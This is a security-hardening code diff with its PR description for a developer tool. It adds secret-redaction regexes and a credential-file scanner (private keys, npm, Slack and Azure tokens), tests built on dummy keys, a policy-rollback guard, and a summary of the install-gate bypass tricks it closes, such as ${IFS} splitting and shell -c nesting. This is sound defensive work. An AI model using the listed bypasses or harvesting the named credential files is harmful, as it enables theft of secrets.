@@ -44,6 +44,14 @@ export interface PolicyThresholds {
 export interface PolicyDoc {
   /** Schema version (integer). Required. */
   version: number;
+  /**
+   * Monotonic policy revision (non-negative integer). Opt-in: once a fleet publishes a
+   * policy with a `revision`, kit refuses to apply a distributed bundle whose revision is
+   * lower (a rollback) — closing the "replay an older validly-signed policy to re-enable a
+   * removed permission" attack on the untrusted transport. Absent → no rollback protection
+   * (backward-compatible); enforcement is a one-way ratchet from the first revision set.
+   */
+  revision?: number;
   /** No untriaged installs (the install-gate must be on). */
   require_triage?: boolean;
   /** Scanners that MUST run (a missing/errored one fails the gate). */
@@ -79,9 +87,38 @@ export function loadPolicy(root: string): PolicyDoc | null {
   }
 }
 
+/** Parse raw `.kit-policy.toml` TEXT (not a path). Returns null when unparseable. Used by
+ *  the control plane to read the incoming bundle's `revision` for rollback protection. */
+export function parsePolicyToml(text: string): PolicyDoc | null {
+  try {
+    return parse(text) as unknown as PolicyDoc;
+  } catch {
+    return null;
+  }
+}
+
 export interface PolicyValidation {
   ok: boolean;
   errors: string[];
+}
+
+/** `revision` (if present) must be a non-negative integer. Extracted to keep validatePolicy
+ *  within the cyclomatic-complexity budget. */
+function revisionError(v: unknown): string | null {
+  if (v === undefined) return null;
+  if (typeof v !== "number" || !Number.isInteger(v) || v < 0) {
+    return "`revision` must be a non-negative integer";
+  }
+  return null;
+}
+
+/** `required_scanners` (if present) must be an array of strings. */
+function requiredScannersError(v: unknown): string | null {
+  if (v === undefined) return null;
+  if (!Array.isArray(v) || v.some((s) => typeof s !== "string")) {
+    return "`required_scanners` must be an array of strings";
+  }
+  return null;
 }
 
 /** Validate a parsed policy against the allow-listed schema. Pure. */
@@ -112,15 +149,13 @@ export function validatePolicy(doc: unknown): PolicyValidation {
   bool("require_triage");
   bool("prod_writes_need_approval");
   bool("require_hardware_identity");
-  if (
-    d.required_scanners !== undefined &&
-    (!Array.isArray(d.required_scanners) || d.required_scanners.some((s) => typeof s !== "string"))
-  ) {
-    errors.push("`required_scanners` must be an array of strings");
-  }
+  const scannersErr = requiredScannersError(d.required_scanners);
+  if (scannersErr) errors.push(scannersErr);
   if (d.min_kit_version !== undefined && typeof d.min_kit_version !== "string") {
     errors.push("`min_kit_version` must be a string");
   }
+  const revErr = revisionError(d.revision);
+  if (revErr) errors.push(revErr);
   if (d.thresholds !== undefined) {
     if (typeof d.thresholds !== "object" || d.thresholds === null) {
       errors.push("`thresholds` must be a table");

--- a/src/policy.test.ts
+++ b/src/policy.test.ts
@@ -90,6 +90,16 @@ describe("checkPolicy", () => {
     assert.match(r.reason, /op "resolve_issue" not in/);
   });
 
+  it("denies a prototype-member vendor name (own-property guard)", async () => {
+    // `toString`/`constructor` resolve to Object.prototype members — a truthy function that
+    // could slip past the deny or throw in the authz path. Only an OWN rule counts.
+    for (const vendor of ["toString", "constructor", "__proto__", "hasOwnProperty"]) {
+      const r = await checkPolicy({ agent_writes: { sentry: ["resolve_issue"] } }, vendor, "x");
+      assert.equal(r.approved, false, vendor);
+      assert.match(r.reason, /not in \[policy\.agent_writes\]/);
+    }
+  });
+
   it("approves when vendor + op match the allow-list", async () => {
     const r = await checkPolicy(
       { agent_writes: { sentry: ["resolve_issue", "create_release"] } },

--- a/src/policy.ts
+++ b/src/policy.ts
@@ -118,7 +118,12 @@ export async function checkPolicy(
     });
     return result;
   }
-  const allowed = policy.agent_writes[vendor];
+  // Own-property guard: a `vendor` of `toString`/`constructor`/`__proto__` would otherwise
+  // resolve to an inherited Object.prototype member (a truthy function) and slip past the
+  // `!allowed` deny — or throw downstream in this authz path. Only an OWN key is a real rule.
+  const allowed = Object.hasOwn(policy.agent_writes, vendor)
+    ? policy.agent_writes[vendor]
+    : undefined;
   if (!allowed) {
     const result: PolicyCheckResult = {
       approved: false,

--- a/src/provision.ts
+++ b/src/provision.ts
@@ -46,7 +46,10 @@ async function updateEnvFile(projectPath: string, secrets: Record<string, string
     lines.push(`${key}=${value}`);
   }
 
-  await writeFile(envPath, lines.join("\n") + "\n", "utf-8");
+  // Create owner-only FROM THE START (mode applies on creation) so a plaintext-secret
+  // .env.local is never briefly world-readable between write and chmod — the same pattern
+  // secrets.ts uses. secureFile then enforces 0o600 / icacls on a pre-existing file too.
+  await writeFile(envPath, lines.join("\n") + "\n", { encoding: "utf-8", mode: 0o600 });
   secureFile(envPath); // plaintext secrets — restrict to owner (0o600 / icacls)
 }
 

--- a/src/scan-plaintext.test.ts
+++ b/src/scan-plaintext.test.ts
@@ -1,0 +1,71 @@
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, writeFileSync, mkdirSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { scanPlaintextSecrets } from "./scan-plaintext.js";
+
+function withTmp(fn: (dir: string) => Promise<void>) {
+  return async () => {
+    const dir = mkdtempSync(join(tmpdir(), "kit-scan-"));
+    try {
+      await fn(dir);
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
+    }
+  };
+}
+
+const labels = (hits: { file: string; findings: { label: string }[] }[], file: string) =>
+  hits.find((h) => h.file === file)?.findings.map((f) => f.label) ?? [];
+
+describe("scanPlaintextSecrets — key-file coverage (B3)", () => {
+  it(
+    "scans raw private-key files the old globs never opened",
+    withTmp(async (dir) => {
+      const pem =
+        "-----BEGIN RSA PRIVATE KEY-----\nMIIEvQIBADANBg\n-----END RSA PRIVATE KEY-----\n";
+      writeFileSync(join(dir, "id_rsa"), pem);
+      writeFileSync(join(dir, "server.pem"), pem);
+      writeFileSync(join(dir, "tls.key"), pem);
+      const hits = await scanPlaintextSecrets(dir);
+      assert.deepEqual(labels(hits, "id_rsa"), ["pem-private-key"]);
+      assert.deepEqual(labels(hits, "server.pem"), ["pem-private-key"]);
+      assert.deepEqual(labels(hits, "tls.key"), ["pem-private-key"]);
+    }),
+  );
+
+  it(
+    "scans .npmrc for an auth token",
+    withTmp(async (dir) => {
+      writeFileSync(
+        join(dir, ".npmrc"),
+        `//registry.npmjs.org/:_authToken=npm_${"a".repeat(36)}\n`,
+      );
+      assert.deepEqual(labels(await scanPlaintextSecrets(dir), ".npmrc"), ["npm-token"]);
+    }),
+  );
+
+  it(
+    "scans a *.pem inside a recursive config dir",
+    withTmp(async (dir) => {
+      mkdirSync(join(dir, "infra"));
+      writeFileSync(
+        join(dir, "infra", "ca.pem"),
+        "-----BEGIN PRIVATE KEY-----\nMIIabc\n-----END PRIVATE KEY-----\n",
+      );
+      assert.deepEqual(labels(await scanPlaintextSecrets(dir), join("infra", "ca.pem")), [
+        "pem-private-key",
+      ]);
+    }),
+  );
+
+  it(
+    "still reports nothing for a clean tree (no false positives)",
+    withTmp(async (dir) => {
+      writeFileSync(join(dir, ".env"), "NODE_ENV=production\nPORT=3000\n");
+      writeFileSync(join(dir, "server.pem"), "not actually a key, just a note\n");
+      assert.deepEqual(await scanPlaintextSecrets(dir), []);
+    }),
+  );
+});

--- a/src/scan-plaintext.ts
+++ b/src/scan-plaintext.ts
@@ -40,11 +40,26 @@ const DEFAULT_FILE_NAMES = [
   "docker-compose.yaml",
   "terraform.tfvars",
   "terraform.tfvars.json",
+  // Credential-bearing files the scan previously never opened: registry/auth configs and
+  // raw private keys. The PEM / npm-token / url-credentials patterns only help if the file
+  // is actually read.
+  ".npmrc",
+  ".netrc",
+  ".pgpass",
+  "id_rsa",
+  "id_dsa",
+  "id_ecdsa",
+  "id_ed25519",
 ];
 
 const DEFAULT_RECURSIVE_DIRS = ["scripts", "config", "infra", "terraform", ".github"];
 
 const RECURSIVE_FILE_EXTS = /\.(sh|js|ts|mjs|cjs|json|yml|yaml|toml|tf|tfvars|tfstate|env)$/;
+
+// Text private-key / cert files (`server.pem`, `tls.key`) — scanned at the root and inside
+// the recursive dirs so a raw PEM block is caught. Binary keystores (.p12/.pfx) are omitted:
+// they carry no text pattern to match and would just be slurped-and-skipped.
+const KEY_FILE_EXTS = /\.(pem|key)$/i;
 
 const SKIP_DIR_NAMES = new Set([
   "node_modules",
@@ -119,6 +134,18 @@ export async function scanPlaintextSecrets(
     await scanFile(name, absolute);
   }
 
+  // Pass 1b: root-level private-key / cert files by extension (`server.pem`, `tls.key`) —
+  // exact-name matching in Pass 1 can't catch arbitrarily-named key files.
+  try {
+    for (const ent of (await readdir(cwd, { withFileTypes: true })) as unknown as Dirent[]) {
+      if ((ent.isFile() || ent.isSymbolicLink()) && KEY_FILE_EXTS.test(ent.name)) {
+        await scanFile(ent.name, join(cwd, ent.name));
+      }
+    }
+  } catch {
+    /* unreadable cwd — skip */
+  }
+
   // Pass 2: depth-limited walk of the configured dirs.
   for (const dirName of dirTargets) {
     const root = resolve(cwd, dirName);
@@ -150,7 +177,7 @@ export async function scanPlaintextSecrets(
       // Only match the known-noisy extensions to keep the scan fast.
       // .tfstate is intentionally included even though it's huge in some
       // repos — the size guard above caps the slurp.
-      if (!RECURSIVE_FILE_EXTS.test(ent.name)) continue;
+      if (!RECURSIVE_FILE_EXTS.test(ent.name) && !KEY_FILE_EXTS.test(ent.name)) continue;
       await scanFile(childRel, childAbs);
     }
   }

--- a/src/utils/redactSecrets.test.ts
+++ b/src/utils/redactSecrets.test.ts
@@ -75,6 +75,56 @@ describe("redactSecrets — connection-string + sk-svcacct (regression)", () => 
   });
 });
 
+describe("redactSecrets — B3 coverage (PEM / cloud / url-token)", () => {
+  it("redacts a raw (non-JSON) PEM private key block", () => {
+    for (const kind of ["RSA ", "EC ", "OPENSSH ", ""]) {
+      const pem = `-----BEGIN ${kind}PRIVATE KEY-----\nMIIEvQIBADANBg\n-----END ${kind}PRIVATE KEY-----`;
+      const out = redactSecrets(`key=${pem}`);
+      assert.ok(out.includes("[REDACTED]"), kind);
+      assert.ok(!out.includes("MIIEvQIBADANBg"), kind);
+    }
+    assert.deepEqual(
+      findSecrets("-----BEGIN EC PRIVATE KEY-----\nabc\n-----END EC PRIVATE KEY-----").map(
+        (f) => f.label,
+      ),
+      ["pem-private-key"],
+    );
+  });
+
+  it("redacts an Azure storage AccountKey but keeps AccountName", () => {
+    const conn =
+      "AccountName=devstore;AccountKey=" + "a".repeat(86) + "==;EndpointSuffix=core.windows.net";
+    const out = redactSecrets(conn);
+    assert.ok(out.includes("AccountName=devstore"));
+    assert.ok(out.includes("[REDACTED]"));
+    assert.ok(!out.includes("a".repeat(86)));
+  });
+
+  it("redacts SendGrid, Slack app-level, and npm tokens", () => {
+    assert.ok(redactSecrets("SG.abcd1234efgh5678.ijkl9012mnop3456qrst").includes("[REDACTED]"));
+    assert.ok(redactSecrets("xapp-1-A012B-345678-abcdef123456").includes("[REDACTED]"));
+    assert.ok(redactSecrets("npm_" + "a".repeat(36)).includes("[REDACTED]"));
+    // npm_config_* env vars are NOT tokens (underscore breaks the run) → no false positive
+    assert.equal(redactSecrets("npm_config_registry=x"), "npm_config_registry=x");
+  });
+
+  it("redacts a token in the URL userinfo with no colon (git/registry PAT form)", () => {
+    const out = redactSecrets("https://ghp_abcdefghijklmnopqrstuvwxyz012345@github.com/o/r");
+    assert.match(out, /https:\/\/\[REDACTED\]@github\.com/);
+    // a short, non-secret username is left alone
+    assert.equal(redactSecrets("https://peter@example.com"), "https://peter@example.com");
+  });
+
+  it("PEM matcher is ReDoS-safe on an unterminated near-miss body", () => {
+    const payload = "-----BEGIN RSA PRIVATE KEY-----" + "A".repeat(200000);
+    const t0 = process.hrtime.bigint();
+    redactSecrets(payload);
+    findSecrets(payload);
+    const ms = Number(process.hrtime.bigint() - t0) / 1e6;
+    assert.ok(ms < 200, `PEM-shaped blob scanned in ${ms.toFixed(0)}ms — should be <200ms`);
+  });
+});
+
 describe("redactSecrets — provider tokens (prefix-exclusion leak fix)", () => {
   it("redacts provider tokens previously skipped by the prefix allowlist", () => {
     for (const kv of [

--- a/src/utils/redactSecrets.test.ts
+++ b/src/utils/redactSecrets.test.ts
@@ -115,6 +115,19 @@ describe("redactSecrets — B3 coverage (PEM / cloud / url-token)", () => {
     assert.equal(redactSecrets("https://peter@example.com"), "https://peter@example.com");
   });
 
+  it("URL patterns are ReDoS-safe on a long hyphen/dot run with no scheme", () => {
+    // The unbounded scheme run `[a-z0-9+.-]*` rescanned from every start looking for `://`
+    // → O(n²). Bounding the scheme keeps it linear.
+    const payload = "a-".repeat(100000); // 200 KB, no `://`
+    const t0 = process.hrtime.bigint();
+    redactSecrets(payload);
+    findSecrets(payload);
+    const ms = Number(process.hrtime.bigint() - t0) / 1e6;
+    assert.ok(ms < 200, `hyphen-run scanned in ${ms.toFixed(0)}ms — possible ReDoS`);
+    // real connection strings still redact (incl. a long-ish scheme like mongodb+srv)
+    assert.match(redactSecrets("mongodb+srv://u:passwordvalue@c.mongodb.net"), /\[REDACTED\]@/);
+  });
+
   it("PEM matcher is ReDoS-safe on an unterminated near-miss body", () => {
     const payload = "-----BEGIN RSA PRIVATE KEY-----" + "A".repeat(200000);
     const t0 = process.hrtime.bigint();

--- a/src/utils/redactSecrets.ts
+++ b/src/utils/redactSecrets.ts
@@ -96,6 +96,15 @@ export const SECRET_PATTERNS: RedactPattern[] = [
     re: /"private_key":\s*"-----BEGIN [^"]{1,8000}-----END [^"]{0,200}-----\\n"/g,
     label: "gcp-private-key",
   },
+  // Raw (non-JSON) PEM private key block — `id_rsa`, a leaked `.pem`, or a key pasted
+  // into a config/env. The JSON form above only catches an escaped-newline value inside
+  // a `"private_key"` field; a bare armored block slipped through entirely. The body is a
+  // single bounded lazy run between the BEGIN/END markers — no ambiguous alternation — so
+  // it can't catastrophically backtrack. {1,8000} covers a 4096-bit key.
+  {
+    re: /-----BEGIN (?:[A-Z0-9]+ )*PRIVATE KEY-----[\s\S]{1,8000}?-----END (?:[A-Z0-9]+ )*PRIVATE KEY-----/g,
+    label: "pem-private-key",
+  },
   { re: /\bAIza[0-9A-Za-z\-_]{35}\b/g, label: "google-api-key" },
   // Slack
   { re: /\bxox[abprs]-[A-Za-z0-9-]{10,}/g, label: "slack-token" },
@@ -108,6 +117,17 @@ export const SECRET_PATTERNS: RedactPattern[] = [
   { re: /\bsk-[A-Za-z0-9]{40,}/g, label: "openai-key" },
   // Resend
   { re: /\bre_[A-Za-z0-9_]{20,}/g, label: "resend-key" },
+  // Azure storage connection string — the `AccountKey=<base64>` component is the
+  // credential; the rest (AccountName, EndpointSuffix) is not. Azure keys are 88-char
+  // base64 ending in `==`; match 40+ base64 chars to be safe.
+  { re: /\bAccountKey=[A-Za-z0-9+/]{40,}={0,2}/gi, label: "azure-account-key" },
+  // SendGrid API key — `SG.<22 base64url>.<43 base64url>`.
+  { re: /\bSG\.[A-Za-z0-9_-]{16,}\.[A-Za-z0-9_-]{16,}\b/g, label: "sendgrid-key" },
+  // Slack app-level token (`xapp-`) — the `xox[abprs]-` matcher above doesn't cover it.
+  { re: /\bxapp-[A-Za-z0-9-]{10,}/g, label: "slack-app-token" },
+  // npm automation/publish token — `npm_` + 36 base62 chars (distinct from the
+  // `npm_config_*` env prefix, whose underscore breaks this run).
+  { re: /\bnpm_[A-Za-z0-9]{36}\b/g, label: "npm-token" },
   // Generic `KEY=high-entropy` — catches rotation values that get echoed
   // back inside `op item create ... KEY=<value>` style error messages.
   // Only triggers on uppercase-snake-case identifiers followed by `=`
@@ -147,6 +167,15 @@ export const SECRET_PATTERNS: RedactPattern[] = [
   {
     re: /\b([a-z][a-z0-9+.-]*:\/\/[^\s:@/]*:)[^\s@/]{3,}@/gi,
     label: "url-credentials",
+    replacement: "$1[REDACTED]@",
+  },
+  // Token in the URL userinfo with NO colon — `https://<token>@host` — the common git /
+  // registry / webhook form (`https://ghp_xxx@github.com`, `https://<pat>@dev.azure.com`).
+  // The `user:pw@` matcher above stops at the `:`; this one requires a colon-free 16+ char
+  // userinfo (a real username is short and wouldn't be a secret) and keeps the scheme.
+  {
+    re: /\b([a-z][a-z0-9+.-]*:\/\/)[A-Za-z0-9._~%+-]{16,}@/gi,
+    label: "url-token-userinfo",
     replacement: "$1[REDACTED]@",
   },
   // Generic high-entropy hex tokens (32+ hex chars) — last resort

--- a/src/utils/redactSecrets.ts
+++ b/src/utils/redactSecrets.ts
@@ -165,7 +165,11 @@ export const SECRET_PATTERNS: RedactPattern[] = [
   // The `kv-secret` class stops at the `:`/`@`, so these slipped through. Redact
   // ONLY the password and keep the scheme/user/host as diagnostic context.
   {
-    re: /\b([a-z][a-z0-9+.-]*:\/\/[^\s:@/]*:)[^\s@/]{3,}@/gi,
+    // Scheme bounded to {0,15} (real URI schemes are ≤~11 chars): an unbounded `[a-z0-9+.-]*`
+    // rescanned a long hyphen/dot run from every start looking for `://`, giving O(n²)
+    // backtracking on hostile input (a DoS on the scanner / status redaction hot path). The
+    // userinfo/password runs are capped too so no single segment can drive quadratic cost.
+    re: /\b([a-z][a-z0-9+.-]{0,15}:\/\/[^\s:@/]{0,128}:)[^\s@/]{3,256}@/gi,
     label: "url-credentials",
     replacement: "$1[REDACTED]@",
   },
@@ -174,7 +178,7 @@ export const SECRET_PATTERNS: RedactPattern[] = [
   // The `user:pw@` matcher above stops at the `:`; this one requires a colon-free 16+ char
   // userinfo (a real username is short and wouldn't be a secret) and keeps the scheme.
   {
-    re: /\b([a-z][a-z0-9+.-]*:\/\/)[A-Za-z0-9._~%+-]{16,}@/gi,
+    re: /\b([a-z][a-z0-9+.-]{0,15}:\/\/)[A-Za-z0-9._~%+-]{16,256}@/gi,
     label: "url-token-userinfo",
     replacement: "$1[REDACTED]@",
   },


### PR DESCRIPTION
## Description

Completes the security sweep backlog (B1–B5), plus the public web/copy cleanup. Every change is deterministic, fail-closed, and regression-tested; each area was hardened through repeated adversarial re-attacks against the compiled build until it converged.

Full suite: **2328 tests passing**, clean lint/format.

## Changes

**B1 — install-gate parser (12 adversarial rounds → converged).** Closed ~20 fetch-and-execute bypass classes: intra-word quoting, path/backslash/env-prefix bins, process-subst & here-strings, missing verbs (npm install-test/it/update/ci, `yarn global add`, `uv run --with`, corepack + `corepack pnpm@9` dispatch, create/init initiators), shell `-c` (flag clusters `-lc`, ANSI-C `$'…'`, escaped-quote nesting), `${IFS}`/`${IFS<op>}` word-splitting, `npm exec -c/--call` + runner→pm chaining, bare-reinstall + registry-redirect fail-close, `$VAR`/`xargs` indirection. Also fixed three hot-path algorithmic-complexity DoS issues (regex ReDoS, `SEGMENT_SPLIT` O(N²), queue-driver O(N²)) — all now linear with timing regression tests.

**B2 — triage version semantics.** The gate stripped the version, so `npm i evil@1.2.3` was triaged as `latest`. Now the pinned version/tag is carried onto the ref and the triage script **resolves the spec to the exact version the manager installs** (semver/PEP 440), triaging that — exact pins, dist-tags, and ranges (`@2`, `@^1`, `<2`, `~=1.2`). npm alias specs (`name@npm:other`) fail closed. Documented that a PASS is an existence/health/version gate, not a malware verdict (that's opt-in GuardDog).

**B3 — secrets/redaction.** New detectors (raw PEM keys, Azure `AccountKey=`, SendGrid, Slack `xapp-`, npm tokens, token-in-URL-userinfo), all ReDoS-bounded. The audit sink now redacts `error`/`metadata`/`operation`/`environment` **by value** before write (covers chain + remote + queue), chain still verifies, prototype-pollution-safe. `env-inspect` prefix leak bounded; the plaintext scanner now opens `.npmrc`/`id_rsa`/`*.pem`/`*.key`.

**B4 — control-plane.** Monotonic signed `policy.revision` ratchet rejects a replayed older policy over the untrusted transport (floor trusted only from a verifying on-disk policy). gzip-bomb guard on `kit memory pull` (bounded decompression). Bounded remote bundle fetch (timeout + size cap).

**B5 — cross-cutting.** IDs via `crypto.randomUUID()` (unguessable approval handles); `Object.hasOwn` guard on the `agent_writes` authz lookup; `.env.local` created `0o600` atomically.

**Web / copy.** COMMUNITY.md trimmed to real channels then routed to GitHub Discussions (Q&A/Ideas/Showcase) + Issues; dead `…/discussions` links fixed; landing-page doc-wall curated (contributor docs grouped); ROADMAP unlinked from the public page; portfolio case anonymized per NDA. (`llms.txt` + landing-page changes ship in the sandstream.github.io PR.)

## Type of Change

- [x] Bug fix (non-breaking security hardening)

## Breaking Changes

None. The gate catches more previously-missed installs and blocks fewer benign ones; triage refs now carry a version (additive).

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01DbF4MFePXWNCd4dxBQvqH2